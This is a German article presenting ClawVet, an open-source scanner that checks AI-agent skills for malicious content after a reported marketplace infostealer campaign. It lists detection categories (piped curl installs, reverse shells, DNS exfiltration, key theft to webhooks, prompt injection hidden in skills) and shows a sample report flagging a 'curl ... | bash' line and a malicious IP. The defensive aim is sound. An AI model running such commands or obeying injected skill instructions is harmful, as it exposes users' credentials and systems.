ClawVet: Security Scanner für OpenClaw Skills – 6‑Pass‑Analyse gegen bösartige Skills

Die Sicherheit von KI-Agenten und deren Erweiterungen rückt zunehmend in den Fokus. Im Rahmen der sogenannten „ClawHavoc“-Kampagne zeigte sich eine erhebliche Schwachstelle in gängigen Plugin-Ökosystemen: Nach Angaben des ClawVet-Entwicklers waren zeitweise rund 20 Prozent aller Skills auf dem Marketplace ClawHub bösartig. Infostealer tarnten sich als Produktivitäts-Tools und exfiltrierten API-Keys, SSH-Credentials sowie Browser-Daten zu externen Servern. Da herkömmliche, rein Regex-basierte Scans durch clevere Umgehungstechniken oft ins Leere laufen, bedarf es neuer Abwehrmechanismen.

Das Open-Source-Tool ClawVet adressiert dieses Problem mit einem sechsstufigen Analyse-Stack. Der Scanner prüft Konfigurationsdateien auf Prompt-Injection, Credential-Theft, Remote-Code-Execution, Typosquatting und Social-Engineering. Das Ergebnis ist eine einheitliche Risikobewertung, die Entwicklern und Nutzern eine sofortige Entscheidungsgrundlage bietet.

Die sechs Analyse-Schichten im Detail

Pass 1: Skill Parser

Im ersten Schritt extrahiert das Tool YAML-Frontmatter, Code-Blöcke, IPs und Domains aus der jeweiligen Skill-Datei. Diese Rohdaten bilden die Grundlage für alle weiteren Analysen.

Pass 2: Statische Analyse

Ein Regelwerk aus über 50 Mustern durchsucht den Code nach bekannten Angriffsvektoren. Dazu gehören Versuche der Remote-Code-Execution (wie gepipte Curl-Befehle) und der Diebstahl von Zugangsdaten, bei dem API- oder SSH-Keys an Webhooks gesendet werden. Ebenso erkennt die Engine Reverse-Shells, DNS-Exfiltration über Base64-kodierte Subdomains sowie mehrfache Obfuscation-Schichten. Auch versteckte Instruktionen für Prompt-Injections werden in dieser Phase identifiziert.

Pass 3: Metadata Validator

Diese Schicht prüft die Konsistenz der Metadaten. Sie schlägt an bei fehlenden Beschreibungen, undokumentierten Binaries oder Umgebungsvariablen sowie bei inkonsistenten Versionsnummern.

Pass 4: Dependency Checker

Der Fokus liegt hier auf riskanten Installationsmustern. Das System erkennt automatische Bestätigungen bei Paketinstallationen, globale npm-Installs und bekannte bösartige Pakete.

Pass 5: Typosquat Detector

Über den Levenshtein-Abstand gleicht der Scanner den Namen des Skills mit populären Paketen ab. So fallen Impersonation-Angriffe auf, bei denen Angreifer minimale Tippfehler im Namen nutzen.

Pass 6: Semantische Analyse (optional)

Für komplexe Fälle lässt sich die Claude-KI anbinden. Sie analysiert die Instruktionen auf versteckte Funktionalitäten und Social-Engineering-Muster. Hierfür ist ein entsprechender API-Key erforderlich.

Notwendigkeit eines mehrschichtigen Ansatzes

Bösartige Skills umgehen einfache Sicherheitsprüfungen oft durch gezielte Verschleierung. Angreifer teilen Schadcode über mehrere Blöcke auf, kodieren Payloads in Base64 oder verstecken C2-IP-Adressen in unscheinbaren YAML-Metadaten. Hinzu kommen eingebettete Prompt-Injections, die den Agenten zu Aktionen zwingen, die der Nutzer nie autorisiert hat.

Da keine einzelne Analysetechnik all diese Vektoren abdeckt, stellt der mehrschichtige Ansatz sicher, dass komplexe Angriffe nicht unentdeckt bleiben.

Integration in den Entwicklungsalltag

Lokales Scannen per CLI

Entwickler können verdächtige Skills direkt über das Terminal prüfen. Für automatisierte Workflows lässt sich die Ausgabe als JSON formatieren und bei kritischen Funden ein Abbruch erzwingen:

# Lokalen Skill scannen und bei hohem Risiko abbrechen
npx clawvet scan ./my-skill --format json --fail-on high

CI/CD-Pipelines

In GitHub Actions oder ähnlichen CI/CD-Umgebungen lässt sich der Scanner nahtlos als Quality Gate vor einem Merge integrieren.

- name: Vet skill before merge
  run: npx clawvet scan ./my-skill --format json --fail-on high

Web-Dashboard und API

Für Team-Workflows bietet das Projekt eine vollständige REST-API auf Basis von Fastify sowie ein Next.js-Dashboard. Scans lassen sich programmatisch einreichen, auswerten und über Webhooks an Alerting-Systeme koppeln.

Risikobewertung und Reporting

Jeder Scan generiert einen Risk Score von 0 bis 100. Kritische Funde schlagen mit 30 Punkten zu Buche, während hohe, mittlere und niedrige Risiken entsprechend weniger Punkte addieren. Das System deckelt den Wert bei 100 und übersetzt ihn in eine Schulnote.

Die Einstufung reicht von A (0–10) für sichere Skills ohne relevante Funde bis hin zu F (76–100), was eine sofortige Blockade erfordert. Dazwischen signalisieren die Stufen B bis D einen steigenden Prüfbedarf bis hin zum Installationsstopp.

Ein typischer Report listet die genauen Funde auf und gibt eine klare Handlungsempfehlung:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ClawVet Scan Report

 Skill: productivity-boost
 Version: 1.0.0
 Risk Score: 100/100 Grade: F

 [CRITICAL] Curl piped to shell
 curl -sL https://...setup.sh | bash

 [HIGH] Known malicious IP
 91.92.242.15

 Recommendation: BLOCK
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Technische Basis

Das Projekt ist modular in einem Monorepo organisiert. Es trennt das Backend mit Scanner-Engine und REST-API sauber vom Web-Dashboard und dem CLI-Tool. Die Erkennungs-Engine greift auf über 50 Bedrohungsmuster zurück.

Umfangreiche Test-Suites decken auch Edge-Cases wie fehlerhaftes YAML, Unicode-Besonderheiten und große adversariale Eingaben ab. Zudem sind die Regex-Muster gegen “Catastrophic Backtracking” abgesichert, um Denial-of-Service-Angriffe auf den Scanner selbst zu verhindern.

Fazit zur Agenten-Sicherheit

Die Vorfälle rund um kompromittierte Marktplätze verdeutlichen, dass Supply-Chain-Security bei KI-Agenten zwingend erforderlich ist. Einfache Prüfmechanismen greifen zu kurz, weshalb mehrschichtige Analysen aus statischen, semantischen und Metadaten-Checks den neuen Standard bilden sollten.

Durch die Integration in CI/CD-Pipelines und die transparente Risikobewertung liefert ClawVet klare Handlungsempfehlungen. Wer regelmäßig externe Skills in Agenten-Workflows einbindet, erhält damit ein wichtiges Werkzeug für die Due Diligence, bevor sensible Daten abfließen.